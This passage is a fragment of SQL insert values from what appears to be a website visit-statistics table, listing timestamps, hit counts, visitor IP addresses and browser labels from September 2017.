70075,1,1,0,0,'51.255.65.7','other'),(157772,1505770081,1,1,0,0,'217.182.132.16','other'),(157773,1505770233,1,1,0,0,'217.182.132.192','other'),(157774,1505770672,1,1,0,0,'8.29.198.25','other'),(157775,1505770712,2,2,0,0,'54.165.59.7','other'),(157776,1505770758,1,1,0,0,'217.69.133.194','other'),(157777,1505771072,1,1,0,0,'217.182.132.184','other'),(157778,1505771192,1,1,0,0,'65.55.210.24','other'),(157779,1505771595,1,1,0,0,'40.77.167.47','other'),(157780,1505771734,1,1,0,0,'217.182.132.171','other'),(157781,1505772099,1,1,0,0,'51.255.71.98','other'),(157782,1505772171,1,1,0,0,'54.165.59.7','other'),(157783,1505772286,1,1,0,0,'5.45.207.64','other'),(157784,1505772363,1,1,0,0,'217.182.132.97','other'),(157785,1505773054,1,1,0,0,'141.8.183.1','other'),(157786,1505773348,1,1,0,0,'217.182.132.193','other'),(157787,1505773523,1,1,0,0,'217.182.132.22','other'),(157788,1505774332,2,2,0,0,'5.45.207.64','other'),(157789,1505774842,1,1,0,0,'51.255.65.3','other'),(157790,1505775293,1,1,0,0,'164.132.162.187','other'),(157791,1505775862,1,1,0,0,'91.209.11.236','other'),(157792,1505775973,1,1,0,0,'217.182.132.241','other'),(157793,1505776565,2,2,0,0,'5.45.207.64','other'),(157794,1505776695,1,1,0,0,'51.255.71.118','other'),(157795,1505776984,1,1,0,0,'51.255.71.129','other'),(157796,1505777001,1,1,0,0,'91.209.11.236','other'),(157797,1505777457,1,1,0,0,'51.255.71.115','other'),(157798,1505777481,1,1,0,0,'5.45.207.64','other'),(157799,1505777734,1,1,0,0,'217.182.132.25','other'),(157800,1505777737,1,1,0,0,'217.182.132.54','other'),(157801,1505778406,1,1,0,0,'217.182.132.58','other'),(157802,1505778695,1,1,0,0,'207.46.13.98','other'),(157803,1505778798,1,0,1,0,'66.249.66.195',''),(157804,1505778810,1,1,0,0,'141.8.183.1','other'),(157805,1505779303,1,1,0,0,'91.209.11.236','other'),(157806,1505779345,1,1,0,0,'141.8.142.21','other'),(157807,1505779553,1,1,0,0,'217.182.132.183','other'),(157808,1505779613,1,1,0,0,'164.132.162.158','other'),(157809,1505779977,1,1,0,0,'5.45.207.64','other'),(157810,1505780062,1,1,0,0,'217.182.132.58','other'),(157811,1505781505,1,1,0,0,'8.29.198.25','other'),(157812,1505781806,1,1,0,0,'51.255.65.39','other'),(157813,1505782313,1,1,0,0,'51.255.65.25','other'),(157814,1505782623,1,1,0,0,'66.249.66.195','chrome'),(157815,1505782673,1,1,0,0,'164.132.162.187','other'),(157816,1505782679,1,1,0,0,'51.255.65.80','other'),(157817,1505783417,6,6,0,0,'46.229.168.70','other'),(157818,1505783435,7,7,0,0,'46.229.168.79','other'),(157819,1505783467,3,3,0,0,'46.229.168.73','other'),(157820,1505783476,6,6,0,0,'46.229.168.72','other'),(157821,1505783526,3,3,0,0,'46.229.168.74','other'),(157822,1505783545,2,2,0,0,'46.229.168.65','other'),(157823,1505783574,1,1,0,0,'46.229.168.71','other'),(157824,1505783607,7,7,0,0,'46.229.168.80','other'),(157825,1505783617,5,5,0,0,'46.229.168.75','other'),(157826,1505783653,3,3,0,0,'46.229.168.76','other'),(157827,1505783743,3,3,0,0,'46.229.168.68','other'),(157828,1505783787,4,4,0,0,'46.229.168.77','other'),(157829,1505783896,5,5,0,0,'46.229.168.67','other'),(157830,1505784090,6,6,0,0,'46.229.168.66','other'),(157831,1505784161,1,1,0,0,'51.255.65.69','other'),(157832,1505784163,6,6,0,0,'46.229.168.69','other'),(157833,1505784247,1,0,1,0,'68.180.228.221',''),(157834,1505784390,5,5,0,0,'46.229.168.70','other'),(157835,1505784510,4,4,0,0,'46.229.168.80','other'),(157836,1505784606,5,5,0,0,'46.229.168.71','other'),(157837,1505784645,2,2,0,0,'46.229.168.75','other'),(157838,1505784678,3,3,0,0,'46.229.168.73','other'),(157839,1505784679,1,0,1,0,'66.249.66.195',''),(157840,1505784691,4,4,0,0,'46.229.168.72','other'),(157841,1505784739,7,7,0,0,'46.229.168.77','other'),(157842,1505784846,3,3,0,0,'46.229.168.65','other'),(157843,1505784873,5,5,0,0,'46.229.168.68','other'),(157844,1505784954,6,6,0,0,'46.229.168.76','other'),(157845,1505785027,4,4,0,0,'46.229.168.79','other'),(157846,1505785122,3,3,0,0,'46.229.168.74','other'),(157847,1505785250,6,6,0,0,'46.229.168.69','other'),(157848,1505785430,3,3,0,0,'46.229.168.70','other'),(157849,1505785478,4,4,0,0,'46.229.168.67','other'),(157850,1505785594,4,4,0,0,'46.229.168.73','other'),(157851,1505785606,1,1,0,0,'185.105.91.231','firefox'),(157852,1505785612,7,7,0,0,'46.229.168.80','other'),(157853,1505785644,5,5,0,0,'46.229.168.78','other'),(157854,1505785747,1,1,0,0,'51.255.65.30','other'),(157855,1505785762,3,3,0,0,'46.229.168.66','other'),(157856,1505785774,3,3,0,0,'46.229.168.68','other'),(157857,1505785865,6,6,0,0,'46.229.168.75','other'),(157858,1505785996,1,1,0,0,'217.182.132.64','other'),(157859,1505786010,4,4,0,0,'46.229.168.79','other'),(157860,1505786033,4,4,0,0,'46.229.168.71','other'),(157861,1505786049,1,1,0,0,'141.8.183.1','other'),(157862,1505786077,3,3,0,0,'46.229.168.77','other'),(157863,1505786100,4,4,0,0,'46.229.168.65','other'),(157864,1505786187,3,3,0,0,'46.229.168.74','other'),(157865,1505786222,5,5,0,0,'46.229.168.76','other'),(157866,1505786356,4,4,0,0,'46.229.168.69','other'),(157867,1505786447,2,2,0,0,'46.229.168.67','other'),(157868,1505786466,1,1,0,0,'46.229.168.72','other'),(157869,1505786539,2,2,0,0,'46.229.168.80','other'),(157870,1505786592,2,2,0,0,'46.229.168.73','other'),(157871,1505786649,1,1,0,0,'46.229.168.70','other'),(157872,1505786817,2,2,0,0,'46.229.168.66','other'),(157873,1505786859,1,1,0,0,'46.229.168.78','other'),(157874,1505786866,2,2,0,0,'46.229.168.68','other'),(157875,1505787229,1,1,0,0,'217.182.132.150','other'),(157876,1505787554,1,1,0,0,'207.46.13.18','other'),(157877,1505787920,1,1,0,0,'37.112.229.220','chrome'),(157878,1505788322,1,1,0,0,'88.198.19.164','other'),(157879,1505789418,1,1,0,0,'51.255.65.9','other'),(157880,1505789588,1,1,0,0,'137.74.207.161','other'),(157881,1505790277,1,1,0,0,'95.108.181.69','other'),(157882,1505790533,1,1,0,0,'51.255.65.76','other'),(157883,1505790676,1,1,0,0,'51.255.65.96','other'),(157884,1505791317,1,1,0,0,'217.182.132.76','other'),(157885,1505792029,1,1,0,0,'213.133.111.165','other'),(157886,1505792114,1,1,0,0,'178.154.200.27','other'),(157887,1505792342,1,1,0,0,'8.29.198.26','other'),(157888,1505792541,1,1,0,0,'51.255.65.48','other'),(157889,1505793154,1,1,0,0,'217.182.132.69','other'),(157890,1505793513,1,1,0,0,'217.182.132.36','other'),(157891,1505793610,1,1,0,0,'91.209.11.236','other'),(157892,1505794156,1,1,0,0,'51.255.65.63','other'),(157893,1505794444,1,1,0,0,'40.77.167.47','other'),(157894,1505794718,1,1,0,0,'217.182.132.171','other'),(157895,1505794886,1,1,0,0,'217.182.132.18','other'),(157896,1505794991,1,1,0,0,'151.80.27.116','other'),(157897,1505795168,1,1,0,0,'51.255.65.29','other'),(157898,1505795175,1,1,0,0,'217.69.133.194','other'),(157899,1505795254,1,1,0,0,'217.182.132.59','other'),(157900,1505795606,1,0,1,0,'66.249.66.74',''),(157901,1505795625,1,1,0,0,'91.196.178.165','chrome'),(157902,1505795708,1,1,0,0,'217.69.133.84','other'),(157903,1505795838,1,0,1,0,'66.249.66.76',''),(157904,1505796020,1,1,0,0,'51.255.65.77','other'),(157905,1505796820,2,2,0,0,'91.209.11.236','other'),(157906,1505796983,1,1,0,0,'217.182.132.28','other'),(157907,1505797214,1,1,0,0,'51.255.65.21','other'),(157908,1505797289,1,1,0,0,'164.132.162.155','other'),(157909,1505797333,1,1,0,0,'217.182.132.5','other'),(157910,1505797433,1,1,0,0,'5.45.207.64','other'),(157911,1505797833,1,1,0,0,'91.196.178.67','firefox'),(157912,1505798024,1,1,0,0,'217.182.132.23','other'),(157913,1505798346,2,2,0,0,'5.45.207.64','other'),(157914,1505798468,1,1,0,0,'164.132.162.159','other'),(157915,1505798535,1,0,1,0,'66.249.66.201',''),(157916,1505798755,1,1,0,0,'185.137.18.236','chrome'),(157917,1505798823,1,0,1,0,'66.249.66.195',''),(157918,1505798995,1,1,0,0,'164.132.162.164','other'),(157919,1505799307,1,1,0,0,'5.45.207.64','other'),(157920,1505799420,1,0,1,0,'66.249.66.199',''),(157921,1505799533,1,0,1,0,'66.249.66.201',''),(157922,1505799907,1,1,0,0,'51.255.71.123','other'),(157923,1505799912,1,1,0,0,'216.244.66.237','other'),(157924,1505800175,1,1,0,0,'51.255.71.116','other'),(157925,1505800413,1,1,0,0,'51.255.65.7','other'),(157926,1505800594,1,1,0,0,'180.76.15.161','other'),(157927,1505800626,1,1,0,0,'51.255.65.91','other'),(157928,1505801152,1,1,0,0,'91.209.11.236','other'),(157929,1505801333,1,1,0,0,'51.255.65.42','other'),(157930,1505801562,1,1,0,0,'51.255.65.64','other'),(157931,1505801863,1,1,0,0,'5.45.207.64','other'),(157932,1505801906,1,1,0,0,'188.163.16.6','chrome'),(157933,1505802523,1,1,0,0,'217.182.132.37','other'),(157934,1505802657,2,2,0,0,'91.209.11.236','other'),(157935,1505802880,1,1,0,0,'141.8.183.1','other'),(157936,1505803185,1,1,0,0,'8.29.198.26','other'),(157937,1505803837,1,1,0,0,'141.8.183.1','other'),(157938,1505804031,2,2,0,0,'5.45.207.64','other'),(157939,1505804041,1,1,0,0,'217.182.132.148','other'),(157940,1505804263,1,1,0,0,'137.74.201.100','other'),(157941,1505804651,1,1,0,0,'95.132.34.248','chrome'),(157942,1505804744,1,1,0,0,'141.8.183.1','other'),(157943,1505804954,1,1,0,0,'217.182.132.146','other'),(157944,1505805019,1,1,0,0,'164.132.162.155','other'),(157945,1505805087,1,1,0,0,'217.182.132.174','other'),(157946,1505805107,1,1,0,0,'66.249.66.201','chrome'),(157947,1505805193,1,1,0,0,'46.219.78.133','chrome'),(157948,1505805261,2,2,0,0,'5.45.207.64','other'),(157949,1505805525,1,0,1,0,'66.249.66.199',''),(157950,1505805594,2,2,0,0,'91.196.177.26','chrome'),(157951,1505805967,1,1,0,0,'51.255.65.90','other'),(157952,1505806015,1,1,0,0,'185.105.91.231','msie'),(157953,1505806412,1,1,0,0,'217.182.132.55','other'),(157954,1505806762,1,1,0,0,'91.196.177.26','chrome'),(157955,1505806984,1,0,1,0,'66.249.66.199',''),(157956,1505807034,1,1,0,0,'94.179.37.135','chrome'),(157957,1505807198,1,1,0,0,'5.45.207.32','other'),(157958,1505807508,1,1,0,0,'51.255.65.57','other'),(157959,1505807882,1,1,0,0,'141.8.183.1','other'),(157960,1505807990,1,1,0,0,'91.196.177.26','chrome'),(157961,1505808000,1,1,0,0,'217.182.132.90','other'),(157962,1505808056,1,1,0,0,'94.179.37.135','chrome'),(157963,1505809092,1,0,1,0,'66.249.66.74',''),(157964,1505809130,1,1,0,0,'46.200.123.15','firefox'),(157965,1505809925,1,1,0,0,'91.209.11.236','other'),(157966,1505809937,1,1,0,0,'217.182.132.94','other'),(157967,1505810330,1,1,0,0,'51.255.65.61','other'),(157968,1505810406,1,1,0,0,'51.255.65.21','other'),(157969,1505810670,1,1,0,0,'91.215.8.21','chrome'),(157970,1505810676,1,1,0,0,'178.95.244.107','chrome'),(157971,1505810877,1,1,0,0,'159.203.176.243','chrome'),(157972,1505811597,1,1,0,0,'5.45.207.64','other'),(157973,1505811949,1,1,0,0,'94.179.37.135','chrome'),(157974,1505812046,1,1,0,0,'217.182.132.81','other'),(157975,1505812313,1,1,0,0,'91.196.177.46','chrome'),(157976,1505812330,1,1,0,0,'51.255.65.48','other'),(157977,1505812364,1,1,0,0,'159.224.72.142','chrome'),(157978,1505812372,1,1,0,0,'51.255.65.34','other'),(157979,1505812493,1,1,0,0,'217.182.132.79','other'),(157980,1505812566,2,2,0,0,'91.209.11.236','other'),(157981,1505812576,1,1,0,0,'141.8.183.1','other'),(157982,1505813106,1,1,0,0,'51.255.65.50','other'),(157983,1505813447,2,1,1,0,'66.249.66.199',''),(157984,1505813485,1,1,0,0,'77.222.155.89','chrome'),(157985,1505813495,1,1,0,0,'180.76.15.142','other'),(157986,1505813635,1,1,0,0,'31.43.10.41','chrome'),(157987,1505813882,1,1,0,0,'217.182.132.95','other'),(157988,1505813972,1,1,0,0,'91.196.178.99','other'),(157989,1505814024,1,1,0,0,'8.29.198.25','other'),(157990,1505814836,2,2,0,0,'5.45.207.64','other'),(157991,1505815070,2,2,0,0,'91.209.11.236','other'),(157992,1505815105,1,1,0,0,'137.74.207.164','other'),(157993,1505815152,1,1,0,0,'217.182.132.34','other'),(157994,1505815941,1,1,0,0,'51.255.65.26','other'),(157995,1505816119,1,1,0,0,'91.215.8.21','chrome'),(157996,1505816168,1,1,0,0,'217.182.132.24','other'),(157997,1505816875,1,1,0,0,'94.179.37.135','chrome'),(157998,1505816887,2,1,1,0,'66.249.66.75',''),(157999,1505817285,1,1,0,0,'91.209.11.236','other'),(158000,1505817481,1,1,0,0,'91.215.8.21','chrome'),(158001,1505817586,1,1,0,0,'51.255.65.47','other'),(158002,1505817792,1,1,0,0,'51.255.65.45','other'),(158003,1505817920,1,1,0,0,'91.229.121.2','chrome'),(158004,1505818091,1,1,0,0,'217.182.132.20','other'),(158005,1505818220,1,1,0,0,'51.255.65.19','other'),(158006,1505818270,1,1,0,0,'194.44.179.253','chrome'),(158007,1505818753,1,1,0,0,'193.202.118.162','msie'),(158008,1505819055,1,1,0,0,'217.182.132.170','other'),(158009,1505819852,1,1,0,0,'51.255.65.57','other'),(158010,1505819903,1,1,0,0,'217.182.132.172','other'),(158011,1505820036,1,1,0,0,'217.182.132.29','other'),(158012,1505820068,1,1,0,0,'178.159.37.105','chrome'),(158013,1505820287,1,1,0,0,'51.255.65.48','other'),(158014,1505820322,1,1,0,0,'91.196.178.38','chrome'),(158015,1505820339,1,1,0,0,'91.215.8.21','chrome'),(158016,1505820906,1,1,0,0,'91.196.178.69','chrome'),(158017,1505820965,1,1,0,0,'37.54.22.131','chrome'),(158018,1505820991,1,1,0,0,'195.60.71.14','chrome'),(158019,1505821013,1,1,0,0,'167.160.84.183','chrome'),(158020,1505821025,1,1,0,0,'91.196.178.135','chrome'),(158021,1505821149,1,1,0,0,'217.182.132.153','other'),(158022,1505821221,1,1,0,0,'91.196.178.66','chrome'),(158023,1505821249,1,1,0,0,'162.210.196.130','other'),(158024,1505821486,1,1,0,0,'82.196.1.179','firefox'),(158025,1505821637,1,1,0,0,'95.220.99.222','msie'),(158026,1505821683,1,1,0,0,'217.182.132.84','other'),(158027,1505821724,1,1,0,0,'217.182.132.33','other'),(158028,1505822006,1,1,0,0,'137.74.207.120','other'),(158029,1505822086,1,1,0,0,'217.182.132.59','other'),(158030,1505822234,1,1,0,0,'217.182.132.72','other'),(158031,1505822381,1,1,0,0,'180.76.15.11','other'),(158032,1505822414,1,1,0,0,'51.255.71.110','other'),(158033,1505822681,1,1,0,0,'217.182.132.148','other'),(158034,1505822829,1,1,0,0,'51.255.65.13','other'),(158035,1505822878,2,2,0,0,'164.132.162.154','other'),(158036,1505823911,1,1,0,0,'217.182.132.184','other'),(158037,1505824070,1,1,0,0,'178.93.245.40','chrome'),(158038,1505824854,1,1,0,0,'8.29.198.26','other'),(158039,1505825078,1,1,0,0,'91.209.11.236','other'),(158040,1505825352,1,1,0,0,'51.255.65.87','other'),(158041,1505825723,1,1,0,0,'51.255.65.16','other'),(158042,1505826429,1,1,0,0,'91.209.11.236','other'),(158043,1505826447,1,1,0,0,'46.48.13.161','chrome'),(158044,1505826962,2,0,2,0,'66.249.66.199',''),(158045,1505827258,1,1,0,0,'51.255.65.79','other'),(158046,1505827276,1,1,0,0,'217.182.132.149','other'),(158047,1505827281,1,1,0,0,'51.255.65.2','other'),(158048,1505827455,1,1,0,0,'217.20.183.93','chrome'),(158049,1505828235,1,1,0,0,'51.255.65.79','other'),(158050,1505828250,1,1,0,0,'95.133.29.37','chrome'),(158051,1505828645,1,1,0,0,'91.196.177.15','chrome'),(158052,1505828750,1,1,0,0,'91.196.178.131','firefox'),(158053,1505828855,1,1,0,0,'217.182.132.23','other'),(158054,1505829130,1,1,0,0,'91.196.178.66','firefox'),(158055,1505829399,1,1,0,0,'217.182.132.36','other'),(158056,1505829494,1,1,0,0,'51.255.71.111','other'),(158057,1505829765,1,1,0,0,'217.182.132.181','other'),(158058,1505829905,1,1,0,0,'51.255.65.38','other'),(158059,1505830105,1,1,0,0,'46.101.159.215','other'),(158060,1505830139,1,1,0,0,'5.45.207.64','other'),(158061,1505830259,2,2,0,0,'185.137.17.95','chrome'),(158062,1505830732,1,1,0,0,'95.221.54.209','chrome'),(158063,1505830931,3,3,0,0,'91.209.11.236','other'),(158064,1505831446,1,1,0,0,'217.182.132.182','other'),(158065,1505831456,1,1,0,0,'188.166.84.61','chrome'),(158066,1505831487,1,1,0,0,'66.102.9.29','chrome'),(158067,1505831521,1,1,0,0,'51.255.65.76','other'),(158068,1505832001,1,1,0,0,'5.167.216.99','firefox'),(158069,1505832102,1,1,0,0,'164.132.162.154','other'),(158070,1505832333,1,1,0,0,'80.91.174.90','other'),(158071,1505832812,1,1,0,0,'66.249.66.199','chrome'),(158072,1505832984,1,1,0,0,'217.182.132.76','other'),(158073,1505833286,1,1,0,0,'51.255.71.117','other'),(158074,1505833485,1,1,0,0,'91.209.11.236','other'),(158075,1505833591,1,1,0,0,'51.255.65.64','other'),(158076,1505833771,1,1,0,0,'51.255.71.126','other'),(158077,1505833837,2,2,0,0,'5.45.207.64','other'),(158078,1505834118,1,1,0,0,'141.8.183.1','other'),(158079,1505834361,1,0,1,0,'66.249.66.74',''),(158080,1505834417,10,10,0,0,'69.58.178.56','other'),(158081,1505834465,1,1,0,0,'141.8.142.21','other'),(158082,1505834489,1,1,0,0,'185.137.17.68','chrome'),(158083,1505834855,1,1,0,0,'91.196.178.104','chrome'),(158084,1505835219,1,1,0,0,'178.154.200.35','other'),(158085,1505835456,1,1,0,0,'91.209.11.236','other'),(158086,1505835692,1,1,0,0,'8.29.198.26','other'),(158087,1505835838,1,1,0,0,'91.196.178.162','chrome'),(158088,1505836455,1,1,0,0,'217.182.132.75','other'),(158089,1505836874,1,1,0,0,'137.74.207.188','other'),(158090,1505837306,1,1,0,0,'51.255.65.46','other'),(158091,1505837688,1,1,0,0,'51.255.71.125','other'),(158092,1505837764,1,1,0,0,'188.32.47.136','msie'),(158093,1505837994,1,1,0,0,'85.235.59.37','other'),(158094,1505838008,1,1,0,0,'217.182.132.179','other'),(158095,1505838582,1,1,0,0,'91.209.11.236','other'),(158096,1505838701,1,1,0,0,'5.45.207.64','other'),(158097,1505838864,1,1,0,0,'51.255.65.62','other'),(158098,1505839334,1,1,0,0,'51.255.65.95','other'),(158099,1505839474,1,1,0,0,'51.255.71.120','other'),(158100,1505840147,1,1,0,0,'217.182.132.156','other'),(158101,1505840281,1,1,0,0,'51.255.65.5','other'),(158102,1505840334,1,1,0,0,'5.45.207.9','other'),(158103,1505840788,1,1,0,0,'51.255.71.130','other'),(158104,1505841026,2,1,1,0,'66.249.66.195',''),(158105,1505841230,2,2,0,0,'216.244.66.237','other'),(158106,1505841803,1,1,0,0,'51.255.71.127','other'),(158107,1505841970,1,1,0,0,'5.45.207.64','other'),(158108,1505842361,1,1,0,0,'217.182.132.192','other'),(158109,1505842641,1,1,0,0,'217.182.132.174','other'),(158110,1505842654,1,1,0,0,'91.196.178.34','chrome'),(158111,1505842844,1,1,0,0,'51.255.65.38','other'),(158112,1505842874,1,1,0,0,'51.255.71.101','other'),(158113,1505842907,1,0,1,0,'66.249.66.74',''),(158114,1505843002,1,1,0,0,'5.45.207.64','other'),(158115,1505843268,1,1,0,0,'51.255.65.82','other'),(158116,1505843476,1,1,0,0,'137.74.203.194','other'),(158117,1505843838,2,2,0,0,'92.112.125.0','chrome'),(158118,1505844458,1,1,0,0,'54.165.59.7','other'),(158119,1505844499,1,1,0,0,'51.255.65.73','other'),(158120,1505844745,1,1,0,0,'51.255.71.101','other'),(158121,1505845001,1,1,0,0,'217.182.132.183','other'),(158122,1505845047,1,1,0,0,'217.182.132.29','other'),(158123,1505845086,1,1,0,0,'51.255.65.41','other'),(158124,1505845172,1,1,0,0,'81.1.242.33','other'),(158125,1505845240,1,1,0,0,'51.255.65.70','other'),(158126,1505845730,1,1,0,0,'51.255.65.9','other'),(158127,1505845753,1,1,0,0,'91.124.119.74','chrome'),(158128,1505846001,1,1,0,0,'91.209.11.236','other'),(158129,1505846204,1,1,0,0,'51.255.65.88','other'),(158130,1505846220,1,1,0,0,'37.9.113.87','other'),(158131,1505846273,1,1,0,0,'5.45.207.9','other'),(158132,1505846274,1,1,0,0,'46.211.146.20','other'),(158133,1505846526,1,1,0,0,'8.29.198.25','other'),(158134,1505847606,1,1,0,0,'95.108.213.20','other'),(158135,1505847701,1,1,0,0,'5.45.207.64','other'),(158136,1505848214,1,1,0,0,'151.80.27.116','other'),(158137,1505848293,1,1,0,0,'217.182.132.29','other'),(158138,1505848396,1,1,0,0,'51.255.71.121','other'),(158139,1505848408,1,1,0,0,'164.132.162.159','other'),(158140,1505848539,1,1,0,0,'137.74.207.119','other'),(158141,1505848893,1,1,0,0,'217.69.133.4','other'),(158142,1505848923,1,1,0,0,'217.182.132.94','other'),(158143,1505849568,1,1,0,0,'40.77.167.47','other'),(158144,1505849573,1,1,0,0,'91.209.11.236','other'),(158145,1505850344,1,1,0,0,'216.244.66.237','other'),(158146,1505850663,1,1,0,0,'178.154.171.75','other'),(158147,1505850764,1,1,0,0,'37.73.131.71','other'),(158148,1505850874,1,1,0,0,'91.209.11.236','other'),(158149,1505851076,1,1,0,0,'151.80.27.116','other'),(158150,1505851109,1,1,0,0,'95.220.94.181','msie'),(158151,1505851110,1,1,0,0,'176.195.109.150','msie'),(158152,1505851149,1,1,0,0,'37.53.111.126','chrome'),(158153,1505851636,1,1,0,0,'88.99.19.242','other'),(158154,1505851928,1,1,0,0,'217.182.132.191','other'),(158155,1505852324,1,1,0,0,'82.193.102.149','other'),(158156,1505852345,1,1,0,0,'188.255.50.81','msie'),(158157,1505852357,1,1,0,0,'176.195.124.245','msie'),(158158,1505852441,1,1,0,0,'107.167.108.205','other'),(158159,1505852821,1,0,1,0,'66.249.66.195',''),(158160,1505853398,1,1,0,0,'5.45.207.9','other'),(158161,1505853469,4,4,0,0,'216.244.66.237','other'),(158162,1505853538,1,1,0,0,'5.164.105.188','msie'),(158163,1505853713,1,1,0,0,'51.255.71.114','other'),(158164,1505853898,1,1,0,0,'180.76.15.159','other'),(158165,1505853929,1,1,0,0,'51.255.65.28','other'),(158166,1505854053,1,0,1,0,'66.249.66.195',''),(158167,1505854123,1,1,0,0,'180.76.15.15','other'),(158168,1505854345,1,1,0,0,'5.45.207.64','other'),(158169,1505854811,1,1,0,0,'51.255.71.112','other'),(158170,1505854927,1,1,0,0,'217.182.132.7','other'),(158171,1505855200,1,1,0,0,'109.63.164.191','msie'),(158172,1505855427,1,1,0,0,'51.255.71.114','other'),(158173,1505856144,1,1,0,0,'217.182.132.75','other'),(158174,1505856347,1,1,0,0,'137.74.207.108','other'),(158175,1505856666,1,1,0,0,'5.45.207.9','other'),(158176,1505857285,1,1,0,0,'91.209.11.236','other'),(158177,1505857357,1,1,0,0,'8.29.198.27','other'),(158178,1505857586,1,1,0,0,'51.255.65.62','other'),(158179,1505857704,1,1,0,0,'51.255.65.21','other'),(158180,1505858219,1,1,0,0,'178.154.171.75','other'),(158181,1505858544,1,1,0,0,'51.255.65.67','other'),(158182,1505858630,2,2,0,0,'5.45.207.64','other'),(158183,1505858813,1,1,0,0,'51.255.71.101','other'),(158184,1505859137,1,1,0,0,'51.255.65.82','other'),(158185,1505859419,1,1,0,0,'217.182.132.30','other'),(158186,1505859885,1,1,0,0,'217.182.132.178','other'),(158187,1505860115,1,1,0,0,'91.209.11.236','other'),(158188,1505860276,1,1,0,0,'51.255.65.224','other'),(158189,1505860846,1,1,0,0,'188.255.50.81','msie'),(158190,1505860849,1,1,0,0,'5.45.207.9','other'),(158191,1505861251,1,1,0,0,'5.45.207.64','other'),(158192,1505861440,1,1,0,0,'217.182.132.75','other'),(158193,1505861885,1,1,0,0,'95.24.93.85','msie'),(158194,1505862151,1,1,0,0,'5.228.35.80','msie'),(158195,1505862326,1,1,0,0,'217.182.132.82','other'),(158196,1505862536,1,1,0,0,'109.63.149.202','msie'),(158197,1505863047,1,1,0,0,'51.255.65.65','other'),(158198,1505863218,1,1,0,0,'195.238.108.89','chrome'),(158199,1505863224,1,1,0,0,'51.255.65.18','other'),(158200,1505863323,1,1,0,0,'217.182.132.18','other'),(158201,1505863588,1,1,0,0,'217.182.132.97','other'),(158202,1505864120,1,1,0,0,'217.182.132.171','other'),(158203,1505864398,1,1,0,0,'51.255.71.118','other'),(158204,1505866040,1,1,0,0,'51.255.65.86','other'),(158205,1505866130,1,1,0,0,'164.132.162.156','other'),(158206,1505866233,1,1,0,0,'217.182.132.192','other'),(158207,1505866308,1,1,0,0,'217.182.132.80','other'),(158208,1505866334,1,1,0,0,'51.255.65.75','other'),(158209,1505866336,1,1,0,0,'217.182.132.72','other'),(158210,1505866610,1,1,0,0,'178.154.171.75','other'),(158211,1505867092,1,1,0,0,'164.132.162.159','other'),(158212,1505867102,1,1,0,0,'217.182.132.150','other'),(158213,1505867236,1,1,0,0,'40.77.167.47','other'),(158214,1505867303,1,1,0,0,'216.244.66.237','other'),(158215,1505867964,1,1,0,0,'188.255.50.81','msie'),(158216,1505868138,1,1,0,0,'51.255.71.133','other'),(158217,1505868140,1,1,0,0,'178.154.171.75','other'),(158218,1505868200,1,1,0,0,'8.29.198.25','other'),(158219,1505868770,1,1,0,0,'5.166.156.44','msie'),(158220,1505869349,1,1,0,0,'164.132.162.153','other'),(158221,1505869352,1,1,0,0,'51.255.65.57','other'),(158222,1505869612,1,1,0,0,'51.255.65.25','other'),(158223,1505869698,1,1,0,0,'5.45.207.9','other'),(158224,1505869712,1,1,0,0,'5.228.35.80','msie'),(158225,1505869785,1,1,0,0,'51.255.65.76','other'),(158226,1505869858,1,1,0,0,'37.9.113.75','other'),(158227,1505869943,1,1,0,0,'109.63.149.202','msie'),(158228,1505870415,1,1,0,0,'217.182.132.5','other'),(158229,1505870632,1,1,0,0,'51.255.65.35','other'),(158230,1505870812,1,1,0,0,'51.255.71.119','other'),(158231,1505871225,1,1,0,0,'51.255.65.48','other'),(158232,1505871453,1,1,0,0,'137.74.207.108','other'),(158233,1505871988,1,1,0,0,'5.45.207.64','other'),(158234,1505872819,1,1,0,0,'157.55.39.30','other'),(158235,1505872960,1,1,0,0,'51.255.65.96','other'),(158236,1505873084,1,1,0,0,'217.182.132.86','other'),(158237,1505873220,46,46,0,0,'158.69.228.14','chrome'),(158238,1505873568,1,1,0,0,'217.182.132.54','other'),(158239,1505873587,1,1,0,0,'216.244.66.237','other'),(158240,1505873732,1,1,0,0,'157.55.39.30','other'),(158241,1505874258,1,1,0,0,'51.255.71.114','other'),(158242,1505875189,1,1,0,0,'217.182.132.88','other'),(158243,1505875432,1,1,0,0,'164.132.162.187','other'),(158244,1505875558,1,1,0,0,'207.46.13.67','other'),(158245,1505875609,1,1,0,0,'164.132.162.159','other'),(158246,1505875935,1,1,0,0,'5.166.156.44','msie'),(158247,1505876077,1,1,0,0,'51.255.71.127','other'),(158248,1505876539,1,1,0,0,'164.132.162.154','other'),(158249,1505876825,1,1,0,0,'5.228.35.80','msie'),(158250,1505877024,1,1,0,0,'137.74.203.194','other'),(158251,1505877765,1,1,0,0,'5.45.207.9','other'),(158252,1505877804,1,1,0,0,'217.182.132.20','other'),(158253,1505877809,1,1,0,0,'164.132.162.158','other'),(158254,1505877952,1,0,1,0,'66.249.66.75',''),(158255,1505878423,1,1,0,0,'217.69.133.194','other'),(158256,1505878526,1,1,0,0,'54.165.59.7','other'),(158257,1505879030,1,1,0,0,'8.29.198.27','other'),(158258,1505879138,1,1,0,0,'217.182.132.193','other'),(158259,1505880542,2,2,0,0,'5.45.207.9','other'),(158260,1505881010,1,1,0,0,'5.45.207.64','other'),(158261,1505881554,1,1,0,0,'180.76.15.5','other'),(158262,1505881700,1,1,0,0,'95.108.213.20','other'),(158263,1505881872,1,1,0,0,'37.9.113.75','other'),(158264,1505882453,2,2,0,0,'178.154.171.75','other'),(158265,1505882841,1,1,0,0,'217.182.132.28','other'),(158266,1505882962,1,1,0,0,'217.182.132.150','other'),(158267,1505882969,1,1,0,0,'5.166.156.44','msie'),(158268,1505883266,1,1,0,0,'51.255.65.17','other'),(158269,1505883484,1,1,0,0,'137.74.201.99','other'),(158270,1505883669,1,1,0,0,'91.209.11.236','other'),(158271,1505883841,1,1,0,0,'91.196.178.70','firefox'),(158272,1505883904,1,1,0,0,'51.255.71.128','other'),(158273,1505884207,1,1,0,0,'5.228.35.80','msie'),(158274,1505884337,1,1,0,0,'217.182.132.153','other'),(158275,1505884351,1,1,0,0,'109.63.149.202','msie'),(158276,1505884519,1,1,0,0,'217.182.132.33','other'),(158277,1505884769,1,1,0,0,'188.166.68.19','chrome'),(158278,1505884789,1,1,0,0,'5.45.207.9','other'),(158279,1505884793,1,1,0,0,'185.137.17.64','chrome'),(158280,1505885787,1,1,0,0,'217.182.132.240','other'),(158281,1505886074,1,1,0,0,'51.255.65.80','other'),(158282,1505886144,1,1,0,0,'137.74.207.114','other'),(158283,1505886413,1,1,0,0,'217.182.132.36','ot